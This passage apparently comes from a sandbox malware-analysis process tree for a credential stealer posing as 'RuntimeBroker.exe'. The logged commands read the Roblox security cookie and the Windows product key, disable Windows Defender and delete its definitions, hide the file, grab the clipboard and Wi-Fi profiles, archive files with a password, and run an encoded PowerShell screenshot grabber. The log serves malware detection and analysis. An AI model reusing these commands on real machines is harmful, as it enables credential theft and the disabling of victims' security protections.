QAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=35⤵PID:4392
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fmoymp31\fmoymp31.cmdline"36⤵PID:5268
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD4E.tmp" "c:\Users\Admin\AppData\Local\Temp\fmoymp31\CSC9BBFCA51AB943279359B447D6D6BD4D.TMP"37⤵PID:400
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"34⤵PID:6060
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:1388
-
-
C:\Windows\system32\tree.comtree /A /F35⤵PID:3076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"34⤵PID:5960
-
C:\Windows\system32\tree.comtree /A /F35⤵PID:5332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"34⤵PID:5460
-
C:\Windows\system32\tree.comtree /A /F35⤵PID:6064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"34⤵PID:5628
-
C:\Windows\system32\tree.comtree /A /F35⤵PID:1952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"34⤵PID:6004
-
C:\Windows\system32\tree.comtree /A /F35⤵PID:5324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"34⤵PID:5716
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY35⤵
- Command and Scripting Interpreter: PowerShell
PID:6068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"34⤵PID:5396
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY35⤵PID:1212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"34⤵PID:5968
-
C:\Windows\system32\getmac.exegetmac35⤵PID:6128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\aJXce.zip" *"34⤵PID:5976
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:5596
-
-
C:\Users\Admin\AppData\Local\Temp\_MEI58162\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\aJXce.zip" *35⤵PID:5792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"34⤵PID:1520
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:4568
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption35⤵PID:4528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"34⤵PID:6120
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:3476
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory35⤵PID:5440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"34⤵PID:5320
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV135⤵PID:2592
-
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid35⤵PID:4180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"34⤵PID:1184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER35⤵
- Command and Scripting Interpreter: PowerShell
PID:5592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"34⤵PID:4932
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name35⤵
- Detects videocard installed
PID:2824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"34⤵PID:5436
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault35⤵PID:3720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""34⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1692 -
C:\Windows\system32\PING.EXEping localhost -n 335⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2524
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"31⤵PID:5568
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"32⤵PID:896
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"30⤵PID:5448
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"31⤵PID:5928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"29⤵PID:2872
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"30⤵PID:3028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"28⤵PID:5892
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"29⤵PID:4136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"27⤵PID:3624
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"28⤵PID:5520
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"26⤵PID:1176
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"27⤵PID:3480
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"25⤵PID:2140
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"26⤵PID:3160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"24⤵PID:2456
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"25⤵PID:5732
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"26⤵PID:5804
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'27⤵
- Command and Scripting Interpreter: PowerShell
PID:3752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"26⤵PID:5868
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend27⤵
- Command and Scripting Interpreter: PowerShell
PID:5928
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All27⤵
- Deletes Windows Defender Definitions
PID:3716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""26⤵
- Hide Artifacts: Hidden Files and Directories
PID:1156 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"27⤵
- Views/modifies file attributes
PID:4744
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"26⤵PID:4420
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:3108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'27⤵
- Command and Scripting Interpreter: PowerShell
PID:6080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"26⤵PID:5620
-
C:\Windows\system32\tasklist.exetasklist /FO LIST27⤵
- Enumerates processes with tasklist
PID:5852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"26⤵PID:5876
-
C:\Windows\system32\tasklist.exetasklist /FO LIST27⤵
- Enumerates processes with tasklist
PID:6100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"26⤵PID:2532
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName27⤵PID:2336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"26⤵
- Clipboard Data
PID:1256 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:3904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard27⤵
- Clipboard Data
PID:2592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"26⤵PID:3444
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:3740
-
-
C:\Windows\system32\tasklist.exetasklist /FO LIST27⤵
- Enumerates processes with tasklist
PID:5288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:4548
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:5164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"26⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3276 -
C:\Windows\system32\netsh.exenetsh wlan show profile27⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"26⤵PID:2352
-
C:\Windows\system32\systeminfo.exesysteminfo27⤵
- Gathers system information
PID:4600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="26⤵PID:5756
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAf